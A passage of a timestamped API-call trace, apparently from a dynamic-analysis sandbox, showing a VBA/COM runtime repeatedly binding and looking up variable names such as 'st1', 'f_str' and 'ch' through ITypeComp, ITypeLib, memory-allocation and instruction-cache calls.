IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.050] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="st1", lHashVal=0x10d576, pfName=0x182e70, pBstrLibName=0x182da0 | out: pfName=0x182e70*=0, pBstrLibName=0x182da0) returned 0x0 [0042.050] IUnknown:Release (This=0x6992df0) returned 0xc [0042.050] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.050] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="st1", lHashVal=0x10d576, pfName=0x182e70, pBstrLibName=0x182da0 | out: pfName=0x182e70*=0, pBstrLibName=0x182da0) returned 0x0 [0042.050] IUnknown:Release (This=0x6992580) returned 0x6 [0042.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050196, cbMultiByte=4, lpWideCharStr=0x182ff0, cchWideChar=5 | out: lpWideCharStr="st1") returned 4 [0042.050] ITypeComp:RemoteBind (in: This=0x6992590, szName="st1", lHashVal=0x10d576, wFlags=0x5, ppTInfo=0x182fa8, pDescKind=0x182fbc, ppFuncDesc=0x182fc0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182fa8*=0x0, pDescKind=0x182fbc*=0, ppFuncDesc=0x182fc0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050196, cbMultiByte=4, lpWideCharStr=0x182ff0, cchWideChar=5 | out: lpWideCharStr="st1") returned 4 [0042.050] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="st1", lHashVal=0x10d576, wFlags=0x5, ppTInfo=0x182fa8, pDescKind=0x182fbc, ppFuncDesc=0x182fc0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182fa8*=0x0, pDescKind=0x182fbc*=0, ppFuncDesc=0x182fc0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.050] IMalloc:Alloc (This=0x7feffc15380, cb=0xb) returned 0x6c348d0 [0042.050] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x4, _Src=0x5050196 | out: _Dst=0x6c348d0) returned 0x0 [0042.050] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_st1") returned 0x109287 [0042.050] strcpy_s (in: _Dst=0x183100, _DstSize=0xb, _Src="_B_var_st1" | out: _Dst="_B_var_st1") returned 0x0 [0042.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x183100, cbMultiByte=11, lpWideCharStr=0x182f50, cchWideChar=11 | out: lpWideCharStr="_B_var_st1") returned 11 [0042.050] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.051] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_st1", lHashVal=0x109287, pfName=0x183020, pBstrLibName=0x182f50 | out: pfName=0x183020*=0, pBstrLibName=0x182f50) returned 0x0 [0042.051] IUnknown:Release (This=0x6990960) returned 0x7 [0042.051] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.051] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_st1", lHashVal=0x109287, pfName=0x183020, pBstrLibName=0x182f50 | out: pfName=0x183020*=0, pBstrLibName=0x182f50) returned 0x0 [0042.051] IUnknown:Release (This=0x6992850) returned 0x11 [0042.051] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.051] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_st1", lHashVal=0x109287, pfName=0x183020, pBstrLibName=0x182f50 | out: pfName=0x183020*=0, pBstrLibName=0x182f50) returned 0x0 [0042.051] IUnknown:Release (This=0x6992df0) returned 0xc [0042.051] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.051] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_st1", lHashVal=0x109287, pfName=0x183020, pBstrLibName=0x182f50 | out: pfName=0x183020*=0, pBstrLibName=0x182f50) returned 0x0 [0042.051] IUnknown:Release (This=0x6992580) returned 0x6 [0042.051] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.051] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_st1", lHashVal=0x109287, pfName=0x183020, pBstrLibName=0x182f50 | out: pfName=0x183020*=0, pBstrLibName=0x182f50) returned 0x0 [0042.051] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.051] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.051] IUnknown:Release (This=0x6990960) returned 0x7 [0042.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50506a6, cbMultiByte=11, lpWideCharStr=0x182fb0, cchWideChar=12 | out: lpWideCharStr="_B_var_st1") returned 11 [0042.051] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_st1", lHashVal=0x109287, wFlags=0x5, ppTInfo=0x182f68, pDescKind=0x182f7c, ppFuncDesc=0x182f80, ppVarDesc=0x73005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182f68*=0x0, pDescKind=0x182f7c*=0, ppFuncDesc=0x182f80, ppVarDesc=0x73005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.051] _mbscpy_s (in: _Dst=0x183170, _DstSizeInBytes=0x4, _Src=0x5050196 | out: _Dst=0x183170) returned 0x0 [0042.051] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0xb8) returned 0x6b0e4e0 [0042.051] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfb50) [0042.051] GetCurrentProcess () returned 0xffffffffffffffff [0042.051] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.051] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.051] GetCurrentProcess () returned 0xffffffffffffffff [0042.051] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.051] GetCurrentProcess () returned 0xffffffffffffffff [0042.051] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.051] GetCurrentProcess () returned 0xffffffffffffffff [0042.051] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.051] GetCurrentProcess () returned 0xffffffffffffffff [0042.051] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.051] GetCurrentProcess () returned 0xffffffffffffffff [0042.051] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.051] GetCurrentProcess () returned 0xffffffffffffffff [0042.052] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.052] GetCurrentProcess () returned 0xffffffffffffffff [0042.052] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.052] GetCurrentProcess () returned 0xffffffffffffffff [0042.052] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.052] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.052] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184588 | out: ppvObject=0x184588*=0x0) returned 0x80004002 [0042.052] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184580 | out: ppvObject=0x184580*=0x0) returned 0x80004002 [0042.052] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.052] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.052] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184588 | out: ppvObject=0x184588*=0x0) returned 0x80004002 [0042.052] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184580 | out: ppvObject=0x184580*=0x0) returned 0x80004002 [0042.052] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.052] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.052] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184588 | out: ppvObject=0x184588*=0x0) returned 0x80004002 [0042.052] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184580 | out: ppvObject=0x184580*=0x0) returned 0x80004002 [0042.052] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.054] ITypeComp:RemoteBind (in: This=0x6990970, szName="f_str", lHashVal=0x107cdf, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2f6a, cbMultiByte=6, lpWideCharStr=0x182e90, cchWideChar=7 | out: lpWideCharStr="f_str") returned 6 [0042.055] ITypeComp:RemoteBind (in: This=0x6992860, szName="f_str", lHashVal=0x107cdf, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2f6a, cbMultiByte=6, lpWideCharStr=0x182e90, cchWideChar=7 | out: lpWideCharStr="f_str") returned 6 [0042.055] ITypeComp:RemoteBind (in: This=0x6992e00, szName="f_str", lHashVal=0x107cdf, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.055] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="f_str") returned 0x107cdf [0042.055] strcpy_s (in: _Dst=0x182df0, _DstSize=0x6, _Src="f_str" | out: _Dst="f_str") returned 0x0 [0042.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182df0, cbMultiByte=6, lpWideCharStr=0x182c40, cchWideChar=6 | out: lpWideCharStr="f_str") returned 6 [0042.055] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.055] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="f_str", lHashVal=0x107cdf, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.055] IUnknown:Release (This=0x6990960) returned 0x7 [0042.055] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.055] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="f_str", lHashVal=0x107cdf, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.055] IUnknown:Release (This=0x6992850) returned 0x11 [0042.055] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.055] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="f_str", lHashVal=0x107cdf, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.055] IUnknown:Release (This=0x6992df0) returned 0xc [0042.055] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.055] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="f_str", lHashVal=0x107cdf, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.055] IUnknown:Release (This=0x6992580) returned 0x6 [0042.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2f6a, cbMultiByte=6, lpWideCharStr=0x182e90, cchWideChar=7 | out: lpWideCharStr="f_str") returned 6 [0042.055] ITypeComp:RemoteBind (in: This=0x6992590, szName="f_str", lHashVal=0x107cdf, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2f6a, cbMultiByte=6, lpWideCharStr=0x182e90, cchWideChar=7 | out: lpWideCharStr="f_str") returned 6 [0042.055] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="f_str", lHashVal=0x107cdf, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.055] IMalloc:Alloc (This=0x7feffc15380, cb=0xd) returned 0x6c348d0 [0042.055] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x6, _Src=0x38a2f6a | out: _Dst=0x6c348d0) returned 0x0 [0042.055] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_f_str") returned 0x1040cc [0042.055] strcpy_s (in: _Dst=0x182fa0, _DstSize=0xd, _Src="_B_var_f_str" | out: _Dst="_B_var_f_str") returned 0x0 [0042.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182fa0, cbMultiByte=13, lpWideCharStr=0x182df0, cchWideChar=13 | out: lpWideCharStr="_B_var_f_str") returned 13 [0042.056] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.056] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_f_str", lHashVal=0x1040cc, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.056] IUnknown:Release (This=0x6990960) returned 0x7 [0042.056] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.056] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_f_str", lHashVal=0x1040cc, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.056] IUnknown:Release (This=0x6992850) returned 0x11 [0042.056] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.056] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_f_str", lHashVal=0x1040cc, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.056] IUnknown:Release (This=0x6992df0) returned 0xc [0042.056] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.056] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_f_str", lHashVal=0x1040cc, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.056] IUnknown:Release (This=0x6992580) returned 0x6 [0042.056] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.056] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_f_str", lHashVal=0x1040cc, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.056] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.056] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.056] IUnknown:Release (This=0x6990960) returned 0x7 [0042.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50506d2, cbMultiByte=13, lpWideCharStr=0x182e50, cchWideChar=14 | out: lpWideCharStr="_B_var_f_str") returned 13 [0042.056] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_f_str", lHashVal=0x1040cc, wFlags=0x5, ppTInfo=0x182e08, pDescKind=0x182e1c, ppFuncDesc=0x182e20, ppVarDesc=0x66005f00720061, ppTypeComp=0x72007400000000, pDummy=0x0 | out: ppTInfo=0x182e08*=0x0, pDescKind=0x182e1c*=0, ppFuncDesc=0x182e20, ppVarDesc=0x66005f00720061, ppTypeComp=0x72007400000000, pDummy=0x0) returned 0x0 [0042.056] _mbscpy_s (in: _Dst=0x183010, _DstSizeInBytes=0x6, _Src=0x38a2f6a | out: _Dst=0x183010) returned 0x0 [0042.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66ea4bc, cbMultiByte=0, lpWideCharStr=0x5e6064c, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0042.056] ITypeComp:RemoteBind (in: This=0x6990970, szName="ch", lHashVal=0x105ccc, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2f92, cbMultiByte=3, lpWideCharStr=0x182e90, cchWideChar=4 | out: lpWideCharStr="ch") returned 3 [0042.056] ITypeComp:RemoteBind (in: This=0x6992860, szName="ch", lHashVal=0x105ccc, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2f92, cbMultiByte=3, lpWideCharStr=0x182e90, cchWideChar=4 | out: lpWideCharStr="ch") returned 3 [0042.056] ITypeComp:RemoteBind (in: This=0x6992e00, szName="ch", lHashVal=0x105ccc, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.056] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ch") returned 0x105ccc [0042.056] strcpy_s (in: _Dst=0x182df0, _DstSize=0x3, _Src="ch" | out: _Dst="ch") returned 0x0 [0042.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182df0, cbMultiByte=3, lpWideCharStr=0x182c40, cchWideChar=3 | out: lpWideCharStr="ch") returned 3 [0042.057] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.057] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="ch", lHashVal=0x105ccc, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.057] IUnknown:Release (This=0x6990960) returned 0x7 [0042.057] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.057] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="ch", lHashVal=0x105ccc, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.057] IUnknown:Release (This=0x6992850) returned 0x11 [0042.057] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.057] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="ch", lHashVal=0x105ccc, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.057] IUnknown:Release (This=0x6992df0) returned 0xc [0042.057] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.057] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="ch", lHashVal=0x105ccc, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.057] IUnknown:Release (This=0x6992580) returned 0x6 [0042.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2f92, cbMultiByte=3, lpWideCharStr=0x182e90, cchWideChar=4 | out: lpWideCharStr="ch") returned 3 [0042.057] ITypeComp:RemoteBind (in: This=0x6992590, szName="ch", lHashVal=0x105ccc, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2f92, cbMultiByte=3, lpWideCharStr=0x182e90, cchWideChar=4 | out: lpWideCharStr="ch") returned 3 [0042.057] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="ch", lHashVal=0x105ccc, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.057] IMalloc:Alloc (This=0x7feffc15380, cb=0xa) returned 0x6c348d0 [0042.057] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x3, _Src=0x38a2f92 | out: _Dst=0x6c348d0) returned 0x0 [0042.057] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ch") returned 0x10f174 [0042.057] strcpy_s (in: _Dst=0x182fa0, _DstSize=0xa, _Src="_B_var_ch" | out: _Dst="_B_var_ch") returned 0x0 [0042.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182fa0, cbMultiByte=10, lpWideCharStr=0x182df0, cchWideChar=10 | out: lpWideCharStr="_B_var_ch") returned 10 [0042.057] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.057] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_ch", lHashVal=0x10f174, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.057] IUnknown:Release (This=0x6990960) returned 0x7 [0042.057] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.057] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_ch", lHashVal=0x10f174, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.057] IUnknown:Release (This=0x6992850) returned 0x11 [0042.057] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.057] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_ch", lHashVal=0x10f174, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.057] IUnknown:Release (This=0x6992df0) returned 0xc [0042.057] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.057] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_ch", lHashVal=0x10f174, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.057] IUnknown:Release (This=0x6992580) returned 0x6 [0042.057] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.057] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_ch", lHashVal=0x10f174, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.057] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.057] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.058] IUnknown:Release (This=0x6990960) returned 0x7 [0042.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050702, cbMultiByte=10, lpWideCharStr=0x182e50, cchWideChar=11 | out: lpWideCharStr="_B_var_ch") returned 10 [0042.058] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_ch", lHashVal=0x10f174, wFlags=0x5, ppTInfo=0x182e08, pDescKind=0x182e1c, ppFuncDesc=0x182e20, ppVarDesc=0x63005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e08*=0x0, pDescKind=0x182e1c*=0, ppFuncDesc=0x182e20, ppVarDesc=0x63005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.058] _mbscpy_s (in: _Dst=0x183010, _DstSizeInBytes=0x3, _Src=0x38a2f92 | out: _Dst=0x183010) returned 0x0 [0042.058] ITypeComp:RemoteBind (in: This=0x6990970, szName="idial", lHashVal=0x102125, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2fea, cbMultiByte=6, lpWideCharStr=0x182e90, cchWideChar=7 | out: lpWideCharStr="idial") returned 6 [0042.058] ITypeComp:RemoteBind (in: This=0x6992860, szName="idial", lHashVal=0x102125, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2fea, cbMultiByte=6, lpWideCharStr=0x182e90, cchWideChar=7 | out: lpWideCharStr="idial") returned 6 [0042.058] ITypeComp:RemoteBind (in: This=0x6992e00, szName="idial", lHashVal=0x102125, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.058] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="idial") returned 0x102125 [0042.058] strcpy_s (in: _Dst=0x182df0, _DstSize=0x6, _Src="idial" | out: _Dst="idial") returned 0x0 [0042.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182df0, cbMultiByte=6, 